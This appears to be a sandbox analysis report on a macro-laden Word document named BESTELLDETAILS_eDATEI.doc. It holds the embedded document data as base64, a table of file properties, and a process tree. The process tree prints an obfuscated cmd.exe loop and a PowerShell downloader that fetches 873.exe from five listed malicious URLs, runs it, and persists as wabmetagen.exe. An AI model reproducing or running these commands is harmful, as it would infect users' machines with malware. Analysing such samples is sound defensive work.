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 AE4AAABAAAAL8AQAAAASNFZ4 |
WordDocumentDocSuppDataBinDataName: | editdata.mso |
WordDocumentStylesStyleRPrRFontsCs: | Tahoma |
WordDocumentStylesStyleRPrRFontsH-ansi: | Tahoma |
WordDocumentStylesStyleRPrRFontsAscii: | Tahoma |
WordDocumentStylesStyleRsidVal: | 005A24B1 |
WordDocumentStylesStyleLinkVal: | BalloonTextChar |
WordDocumentStylesStyleBasedOnVal: | Normal |
WordDocumentStylesStyleTblPrTblCellMarRightType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarRightW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarBottomType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarBottomW: | - |
WordDocumentStylesStyleTblPrTblCellMarLeftType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarLeftW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarTopType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarTopW: | - |
WordDocumentStylesStyleTblPrTblIndType: | dxa |
WordDocumentStylesStyleTblPrTblIndW: | - |
WordDocumentStylesStyleUiNameVal: | Table Normal |
WordDocumentStylesStyleRPrLangBidi: | AR-SA |
WordDocumentStylesStyleRPrLangFareast: | EN-US |
WordDocumentStylesStyleRPrLangVal: | EN-US |
WordDocumentStylesStyleRPrSz-csVal: | 22 |
WordDocumentStylesStyleRPrSzVal: | 22 |
WordDocumentStylesStyleRPrFontVal: | Calibri |
WordDocumentStylesStylePPrSpacingLine-rule: | auto |
WordDocumentStylesStylePPrSpacingLine: | 259 |
WordDocumentStylesStylePPrSpacingAfter: | 160 |
WordDocumentStylesStyleNameVal: | Normal |
WordDocumentStylesStyleStyleId: | Normal |
WordDocumentStylesStyleDefault: | on |
WordDocumentStylesStyleType: | paragraph |
WordDocumentStylesLatentStylesLsdExceptionName: | Normal |
WordDocumentStylesLatentStylesLatentStyleCount: | 375 |
WordDocumentStylesLatentStylesDefLockedState: | off |
WordDocumentStylesVersionOfBuiltInStylenamesVal: | 7 |
WordDocumentFontsFontSigCsb-1: | 00000000 |
WordDocumentFontsFontSigCsb-0: | 000001FF |
WordDocumentFontsFontSigUsb-3: | 00000000 |
WordDocumentFontsFontSigUsb-2: | 00000009 |
WordDocumentFontsFontSigUsb-1: | C0007841 |
WordDocumentFontsFontSigUsb-0: | E0002AFF |
WordDocumentFontsFontPitchVal: | variable |
WordDocumentFontsFontFamilyVal: | Roman |
WordDocumentFontsFontCharsetVal: | 00 |
WordDocumentFontsFontPanose-1Val: | 02020603050405020304 |
WordDocumentFontsFontName: | Times New Roman |
WordDocumentFontsDefaultFontsCs: | Times New Roman |
WordDocumentFontsDefaultFontsH-ansi: | Calibri |
WordDocumentFontsDefaultFontsFareast: | Calibri |
WordDocumentFontsDefaultFontsAscii: | Calibri |
WordDocumentDocumentPropertiesVersion: | 16 |
WordDocumentDocumentPropertiesCharactersWithSpaces: | 1 |
WordDocumentDocumentPropertiesParagraphs: | 1 |
WordDocumentDocumentPropertiesLines: | 1 |
WordDocumentDocumentPropertiesCharacters: | 1 |
WordDocumentDocumentPropertiesWords: | - |
WordDocumentDocumentPropertiesPages: | 1 |
WordDocumentDocumentPropertiesLastSaved: | 2019:01:22 19:45:00Z |
WordDocumentDocumentPropertiesCreated: | 2019:01:22 19:45:00Z |
WordDocumentDocumentPropertiesTotalTime: | - |
WordDocumentDocumentPropertiesRevision: | 1 |
WordDocumentIgnoreSubtreeVal: | http://schemas.microsoft.com/office/word/2003/wordml/sp2 |
WordDocumentOcxPresent: | no |
WordDocumentEmbeddedObjPresent: | no |
WordDocumentMacrosPresent: | yes |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2944 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\BESTELLDETAILS_eDATEI.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4024 | c:\w8525\l1499\r2543\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set lkQi=:~pW7U+P@j20CTw-z\k9bxZ/A5fqt=Ryvgl%EGJ(18u;'6KS.LO{h} XDsie$rcm3aMdBF)oN4n,I&&for %f in (2;71;14;35;7;5;68;49;76;12;0;1;25;75;40;35;61;35;47;36;47;47;76;50;72;72;24;66;36;0;1;15;73;75;40;35;52;35;13;36;66;7;0;1;15;64;75;40;35;34;34;54;60;20;45;25;19;25;29;44;2;4;45;41;25;44;43;60;62;45;41;19;73;29;74;59;14;15;71;20;9;59;62;28;54;72;59;28;48;3;59;20;12;34;58;59;74;28;43;60;58;73;4;45;25;29;44;52;28;28;2;0;23;23;9;42;63;59;57;65;63;59;67;58;74;65;48;62;71;63;23;69;46;62;55;34;28;30;65;8;52;28;28;2;0;23;23;63;65;61;58;2;71;57;65;2;34;42;57;48;62;71;63;23;58;67;31;42;67;38;16;67;8;52;28;28;2;0;23;23;20;34;65;63;67;58;33;58;28;65;34;48;62;71;63;23;67;62;10;62;56;58;11;8;52;28;28;2;0;23;23;67;71;62;42;63;59;74;28;65;28;58;71;74;15;62;71;74;28;59;57;28;48;62;71;63;23;24;7;31;10;7;66;61;26;67;71;8;52;28;28;2;0;23;23;59;74;59;61;9;58;58;18;34;58;63;34;59;74;67;58;61;63;59;48;62;71;63;23;14;2;15;65;67;63;58;74;23;62;57;57;23;22;31;50;13;45;34;28;63;74;49;44;48;47;2;34;58;28;39;44;8;44;70;43;60;27;19;73;19;45;29;44;57;64;45;45;4;44;43;60;14;64;25;10;73;54;29;54;44;41;4;64;44;43;60;62;73;10;19;40;29;44;67;45;41;40;40;44;43;60;52;45;64;25;11;29;60;59;74;32;0;28;59;63;2;6;44;17;44;6;60;14;64;25;10;73;6;44;48;59;21;59;44;43;26;71;61;59;65;62;52;39;60;18;10;73;11;41;54;58;74;54;60;58;73;4;45;25;70;51;28;61;31;51;60;62;45;41;19;73;48;56;71;14;74;34;71;65;67;69;58;34;59;39;60;18;10;73;11;41;75;54;60;52;45;64;25;11;70;43;60;9;64;45;73;19;29;44;2;45;45;4;64;44;43;76;26;54;39;39;37;59;28;15;76;28;59;63;54;60;52;45;64;25;11;70;48;34;59;74;33;28;52;54;15;33;59;54;73;11;11;11;11;70;54;51;76;74;32;71;18;59;15;76;28;59;63;54;60;52;45;64;25;11;43;60;9;4;4;73;19;29;44;58;19;41;41;25;44;43;20;61;59;65;18;43;53;53;62;65;28;62;52;51;53;53;60;2;45;10;73;19;29;44;67;73;4;25;25;44;43;78)do set 3ud2=!3ud2!!lkQi:~%f,1!&&if %f equ 78 echo !3ud2:*3ud2!=!|cmd.exe" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2524 | CmD /V:ON/C"set lkQi=:~pW7U+P@j20CTw-z\k9bxZ/A5fqt=Ryvgl%EGJ(18u;'6KS.LO{h} XDsie$rcm3aMdBF)oN4n,I&&for %f in (2;71;14;35;7;5;68;49;76;12;0;1;25;75;40;35;61;35;47;36;47;47;76;50;72;72;24;66;36;0;1;15;73;75;40;35;52;35;13;36;66;7;0;1;15;64;75;40;35;34;34;54;60;20;45;25;19;25;29;44;2;4;45;41;25;44;43;60;62;45;41;19;73;29;74;59;14;15;71;20;9;59;62;28;54;72;59;28;48;3;59;20;12;34;58;59;74;28;43;60;58;73;4;45;25;29;44;52;28;28;2;0;23;23;9;42;63;59;57;65;63;59;67;58;74;65;48;62;71;63;23;69;46;62;55;34;28;30;65;8;52;28;28;2;0;23;23;63;65;61;58;2;71;57;65;2;34;42;57;48;62;71;63;23;58;67;31;42;67;38;16;67;8;52;28;28;2;0;23;23;20;34;65;63;67;58;33;58;28;65;34;48;62;71;63;23;67;62;10;62;56;58;11;8;52;28;28;2;0;23;23;67;71;62;42;63;59;74;28;65;28;58;71;74;15;62;71;74;28;59;57;28;48;62;71;63;23;24;7;31;10;7;66;61;26;67;71;8;52;28;28;2;0;23;23;59;74;59;61;9;58;58;18;34;58;63;34;59;74;67;58;61;63;59;48;62;71;63;23;14;2;15;65;67;63;58;74;23;62;57;57;23;22;31;50;13;45;34;28;63;74;49;44;48;47;2;34;58;28;39;44;8;44;70;43;60;27;19;73;19;45;29;44;57;64;45;45;4;44;43;60;14;64;25;10;73;54;29;54;44;41;4;64;44;43;60;62;73;10;19;40;29;44;67;45;41;40;40;44;43;60;52;45;64;25;11;29;60;59;74;32;0;28;59;63;2;6;44;17;44;6;60;14;64;25;10;73;6;44;48;59;21;59;44;43;26;71;61;59;65;62;52;39;60;18;10;73;11;41;54;58;74;54;60;58;73;4;45;25;70;51;28;61;31;51;60;62;45;41;19;73;48;56;71;14;74;34;71;65;67;69;58;34;59;39;60;18;10;73;11;41;75;54;60;52;45;64;25;11;70;43;60;9;64;45;73;19;29;44;2;45;45;4;64;44;43;76;26;54;39;39;37;59;28;15;76;28;59;63;54;60;52;45;64;25;11;70;48;34;59;74;33;28;52;54;15;33;59;54;73;11;11;11;11;70;54;51;76;74;32;71;18;59;15;76;28;59;63;54;60;52;45;64;25;11;43;60;9;4;4;73;19;29;44;58;19;41;41;25;44;43;20;61;59;65;18;43;53;53;62;65;28;62;52;51;53;53;60;2;45;10;73;19;29;44;67;73;4;25;25;44;43;78)do set 3ud2=!3ud2!!lkQi:~%f,1!&&if %f equ 78 echo !3ud2:*3ud2!=!|cmd.exe" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2520 | C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $b6595='p7685';$c6894=new-object Net.WebClient;$i4765='http://jumesamedina.com/FKcXltRa@http://mariposaplus.com/idyudJzd@http://blamdigital.com/dc2cDi0@http://documentation-contest.com/APy2PMrfdo@http://enerjiiklimlendirme.com/wp-admin/css/ZyOT6ltmnL'.Split('@');$q9496='s3667';$w3524 = '873';$c4291='d6811';$h6350=$env:temp+'\'+$w3524+'.exe';foreach($k2408 in $i4765){try{$c6894.DownloadFile($k2408, $h6350);$j3649='p6673';If ((Get-Item $h6350).length -ge 40000) {Invoke-Item $h6350;$j7749='i9885';break;}}catch{}}$p6249='d4755';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2628 | cmd.exe | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3064 | powershell $b6595='p7685';$c6894=new-object Net.WebClient;$i4765='http://jumesamedina.com/FKcXltRa@http://mariposaplus.com/idyudJzd@http://blamdigital.com/dc2cDi0@http://documentation-contest.com/APy2PMrfdo@http://enerjiiklimlendirme.com/wp-admin/css/ZyOT6ltmnL'.Split('@');$q9496='s3667';$w3524 = '873';$c4291='d6811';$h6350=$env:temp+'\'+$w3524+'.exe';foreach($k2408 in $i4765){try{$c6894.DownloadFile($k2408, $h6350);$j3649='p6673';If ((Get-Item $h6350).length -ge 40000) {Invoke-Item $h6350;$j7749='i9885';break;}}catch{}}$p6249='d4755'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2740 | "C:\Users\admin\AppData\Local\Temp\873.exe" | C:\Users\admin\AppData\Local\Temp\873.exe | — | powershell.exe |
User: admin Company: Networks Associates Technology, Inc Integrity Level: MEDIUM Exit code: 0 Version: 8, 0, 0, 26 | ||||
3856 | "C:\Users\admin\AppData\Local\Temp\873.exe" | C:\Users\admin\AppData\Local\Temp\873.exe | 873.exe | |
User: admin Company: Networks Associates Technology, Inc Integrity Level: MEDIUM Exit code: 0 Version: 8, 0, 0, 26 | ||||
3116 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | — | 873.exe |
User: admin Company: Networks Associates Technology, Inc Integrity Level: MEDIUM Exit code: 0 Version: 8, 0, 0, 26 | ||||
3740 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | wabmetagen.exe | |
User: admin Company: Networks Associates Technology, Inc Integrity Level: MEDIUM Version: 8, 0, 0, 26 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE2D2.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9DDBFCAC.jpg | — | |
MD5:— | SHA256:— | |||
3064 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YD2NWCWH3SM34JN27CF8.temp | — | |
MD5:— | SHA256:— | |||
3064 | powershell.exe | C:\Users\admin\AppData\Local\Temp\873.exe | — | |
MD5:— | SHA256:— | |||
